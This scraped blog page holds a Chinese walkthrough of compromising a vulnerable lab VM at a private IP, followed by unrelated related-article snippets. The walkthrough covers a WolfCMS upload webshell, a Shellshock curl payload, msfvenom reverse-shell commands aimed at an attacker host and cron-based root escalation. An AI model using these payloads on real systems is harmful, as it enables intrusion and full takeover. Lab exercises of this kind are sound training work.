河北定制网站建设调试黄骅贴吧新鲜事

news/2025/9/22 23:14:58/文章来源:
河北定制网站建设调试,黄骅贴吧新鲜事,描述网站的整体建设一般步骤,做网站后的收获信息收集 探测存活主机 发现存活主机为192.168.217.133 探测开放端口 nmap -sT -p- 192.168.217.133 -oA ./ports 发现两个端口开放#xff0c;分别是22 3128#xff0c;同时探测到了8080端口#xff0c;但是显示是关闭的状态。 UDP端口探测 nmap -sU --top-ports 20 1…信息收集 探测存活主机 发现存活主机为192.168.217.133 探测开放端口 nmap -sT -p- 192.168.217.133 -oA ./ports 发现两个端口开放分别是22 3128同时探测到了8080端口但是显示是关闭的状态。 UDP端口探测 nmap -sU --top-ports 20 192.168.217.133 -oA ./ports 版本服务信息探测 nmap -sT -sV -sC -O -p22,3128,8080 192.168.217.133 -oA ./details 漏洞脚本探测 nmap -sT --scriptvuln 192.168.217.133 -oA ./vuln 渗透测试 尝试访问192.168.217.133 访问不到由于上面信息收集到3128端口开放的服务是squid-http不知道这是什么东西百度下 发现这是一个代理服务器因此我们尝试利用这个代理去访问一下192.168.217.133地址 我们尝试利用代理进行访问成功能访问到目标靶机上的页面。 目录扫描 进行目录扫描的时候需要使用3128的代理 发现robots.txt文件尝试访问这个文件 发现wolfcms尝试访问这个目录确实存在一套内容管理系统 现在怎么办不妨找一下这个系统公开漏洞尝试利用一下 发现了这套系统存在后台的任意文件上传漏洞后台的登陆地址为ip/?/admin/login 确实存在相关的后台登陆地址接下来我们先尝试弱口令进行登录admin/123456 失败 admin/admin成功 登陆成功上来发现了wolf cms 的版本为0.8.2该版本存在任意文件上传漏洞 编写木马的内容直接php一句话木马 利用蚁剑连接webshell 当然了蚁剑是需要挂代理的 权限是www-data权限需要进行权限提升 还有一种方法就是我们能够修改他的代码尝试在articles中添加反弹shell的代码 之所以端口是443是因为对方的机器可能是不出网的 攻击机起一个监听 当我们点击articles的时候便会收到一个shell! 查看网站目录下的config.php文件 发现了一个数据库的账号和密码 查看用户信息 cat /etc/passwd 发现了几个账号root、最后面有一个sickos用户。尝试利用ssh进行登录 提权 成功登录查看权限 sudo -l 具有全部的权限看到三个ALL也就证明我们几乎是拿到了最高权限 sudo /bin/bash 切换到root的家目录 另一种方式 这个看到红队笔记的打法利用nikto进行扫描 nikto -h 192.168.217.133 -useproxyhttp://192.168.217.133:3128/ 经过扫描发现存在shellshock漏洞。 shellshock简介 shellshock即unix 系统下的bash shell的一个漏洞Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞向环境变量值内的函数定义后添加多余的字符串会触发此漏洞攻击者可利用此漏洞改变或绕过环境限制以执行任意的shell命令,甚至完全控制目标系统。 判断是否真的存在shellshock漏洞 利用curl进行判断 curl -v --proxy http://192.168.217.133:3128/ http://192.168.217.133/cgi-bin/status -H Referer:() { test;}; echo Content-type: text/plain; echo; echo; /usr/bin/id;exit 利用msfvenom生成木马代码 msfvenom -p cmd/unix/reverse_bash lhost192.168.217.128 lport443 -f raw 然后粘贴到curl中进行执行 成功获取到反弹shell 查看操作系统的相关信息 uname -a dpkg -l //查看操作系统都安装了哪些软件 发现安装了python所以我们尝试利用python去开启一个交互性好的bash python -c import pty;pty.spawn(/bin/bash) 之后我们尝试看一下网站的目录下存在什么东西一般来说网站都在/var/www目录下 有一个connect.py文件看一下 大概说是 我尝试非常规律的连接一些事情你或许想要试试我的服务 计划任务 服务 上述文件是/etc/crontab的结果再看看cron.d 发现了之前我们看到的那个connect文件的定时任务大概就是每一分钟以root身份执行一下connect这个文件因此我们可以在connect文件中写入代码那么经过一分钟之后便会得到执行结果 利用msfvenom生成一个反弹shell的代码 msfvenom -p cmd/unix/reverse_python lhost192.168.217.128 lport444 -f raw 生成的代码如上我们只需要将他放到connect.py文件中即可 之后我们在攻击机上起一个监听等一分钟后便会得到一个root的shell 之后我们直接读取root家目录下的文件即可

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/910710.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

使用python读取windows注册表

在windows系统中,注册表 是系统定义的数据库,应用程序和系统组件在其中存储和检索配置数据。 注册表是一个分层数据库,其中包含对 Windows本身以及Windows上运行的应用程序和服务至关重要的数据。 因此我们还是不好…

当日总结

继承 继承是面向对象编程中的一个重要特性,它允许一个类(子类)继承另一个类(父类)的属性和方法。通过继承,子类可以重用父类的代码,从而提高代码的复用性和模块化。在Java中,继承通过extends关键字实现,Java只…

3123004481

第一次个人编程作业这个作业属于哪个课程 https://edu.cnblogs.com/campus/gdgy/Class34Grade23ComputerScience这个作业要求在哪里 https://edu.cnblogs.com/campus/gdgy/Class34Grade23ComputerScience/homework/134…

淮安建设局网站最新产品上市代理加盟

jpa 手动预编译JPA提供了几种查询数据的方法。 可以根据各种标准(例如,使用的语言(SQL与JPQL)或查询是静态的(编译时间)还是动态的(执行时间))对此类替代方案进行分类。 …

网站开发实训指导书在线制作广告图片

原标题:赵县308国道一路口发生一起大货车与电动三轮车碰撞事故,电动三轮车驾驶人受伤。2020年11月4日上午,赵县308国道一路口发生一起大货车与电动三轮车碰撞事故,造成电动三轮车驾驶人受伤。大货车驾驶人驾驶一辆重型货车&#x…

科技公司网站设计方案页面设计公司招聘

怎么把Python当计算器用?(小白自学笔记) Part I:标准数学包的导入 今天刚刚装了python,打算用它来取代matlab的基本计算功能,当我的日常计算器用。(这里还有一个捷径,如果你跟我一样也是纯小白的话,直接问c…

青春网站建设工作室wordpress调出媒体库

文章目录 一.docker容器概述1.什么是容器2. docker与虚拟机的区别2.1 docker虚拟化产品有哪些及其对比2.2 Docker与虚拟机的区别 3.Docker容器的使用场景4.Docker容器的优点5.Docker 的底层运行原理6.namespace的六项隔离7.Docker核心概念 二.Docker安装 及管理1.安装 Docker1.…

旅游网站开发系统的er图服务好的镇江网站优化

为保证2019年上半年博士生毕业工作顺利开展,根据我校博士生答辩管理的相关文件,现将有关事项通知如下,请遵照执行。1.毕业申请:拟毕业研究生于3月15日前登录“中南大学研究生教育管理信息系统”(以下简称管理系统),在管理系统个人…

网站备案需要具备什么wordpress 元描述

文章目录 1、写时拷贝2、进程终止2.1 进程退出场景2.1.1 退出码2.1.2 错误码错误码 vs 退出码2.1.3 代码异常终止引入 2.2 进程常见退出方法2.2.1 exit函数2.2.2 _exit函数 本片我们主要来讲进程控制,讲之前我们先把写时拷贝理清,然后再开始讲进程控制。…

文具电子商务网站开发内容哈尔滨网站备案手续

应用架构与可观测技术演进历程 在软件开发早期,单体应用架构因其结构简单,便于测试和部署,得到了广泛的应用,对应的监控诊断技术主要是基于日志和日志关键词的指标监控。随着软件复杂度的不断提升,单体应用架构逐步向分…

购物网站建设基本流程树状图大连网站建设设计公司哪家好

深度学习模型种类繁多,可以根据任务类型和应用场景进行分类。以下是主要模型类型的详细介绍,每种模型包含了其特点、功能、代表性模型,以及常见应用。 1. 分类模型 分类模型是深度学习中最基本也是最广泛应用的模型类型,其目标是…

使用python读取windows日志表

在windows系统中,注册表 是系统定义的数据库,应用程序和系统组件在其中存储和检索配置数据。 注册表是一个分层数据库,其中包含对 Windows本身以及Windows上运行的应用程序和服务至关重要的数据。 因此我们还是不好…

西安市免费做网站站长统计幸福宝下载

引言 在当前计算机科学领域中,保护软件代码的安全性和隐私性变得愈发重要。为了防止黑客攻击和恶意软件分析,开发人员采用各种技术来混淆和加密其代码,其中包括JS混淆技术。本文将介绍JS混淆技术的原理和应用,并提供一些相关的加密…

网站建设方案对比分析社区团购最新模式

1.Python2.webservice3.requirejs4.idea5.webService6.redis7.doubble8.mongDB9.zookper 大数据学习曲线:课程一、大数据运维之Linux基础课程二、大数据开发核心技术-Hadoop 2.x从入门到精通课程三、大数据开发核心技术-大数据仓库Hive精讲课程四、大数据协作框架-S…

建设厅八大员报名网站免费企业网站源码

跳跃游戏 给你一个非负整数数组 nums ,你最初位于数组的 第一个下标 。数组中的每个元素代表你在该位置可以跳跃的最大长度。 判断你是否能够到达最后一个下标,如果可以,返回 true ;否则,返回 false 。在这里插入图片…

建设银行甘肃分行网站企业微信app下载安装官网

CentOS 安装nginx 安装使用的是配置nginx官网yum仓库安装 同时适用于Red Hat Enterprise Linux 及其衍生产品,例如 CentOS、Oracle Linux、Rocky Linux、AlmaLinux 如想使用压缩包解压方式安装请自行百度 注:安装全程使用非root用户 且 该用户已有sudo权…

佛山营销型网站建设公司第三方网站开发优缺点

YUM 功能 软件包安装&#xff1a; 通过yum命令安装软件包。例如&#xff0c;安装一个名为 example-package 的软件包 yum install example-package更新包 检查更新&#xff1a; 检查可用更新&#xff1a; sudo yum check-update <package_name>软件包更新&#xff1a; y…

万网官方网站浙江省建设工程监理管理协会网站

题目描述 最近米咔买了n个苹果和m个香蕉&#xff0c;他每天可以选择吃掉一个苹果和一个香蕉&#xff08;必须都吃一个&#xff0c;即如果其中一种水果的数量为0&#xff0c;则他不能进行这个操作&#xff09;&#xff0c;或者使用魔法将某一种水果的数量翻倍。 现在米咔想吃西…

宿州产品网站建设网站开发合同书

本文是LLM系列文章&#xff0c;针对《Meta Semantic Template for Evaluation of Large Language Models》的翻译。 大型语言模型评估的元语义模板 摘要1 引言2 相关工作3 方法4 实验5 结论 摘要 大型语言模型(llm)是否真正理解语言的语义&#xff0c;或者只是记住训练数据?…

开机RAM分析调试SOP

思维导图 数据来源 内存分解对比项一、硬件保留内存 二、MemFree剩余物理内存 三、MemAvailable剩余可用内存Kernel占用内存 用户空间占用内存 思维导图 数据来源/proc/meminfo 内存状态信息 dumpsys memin…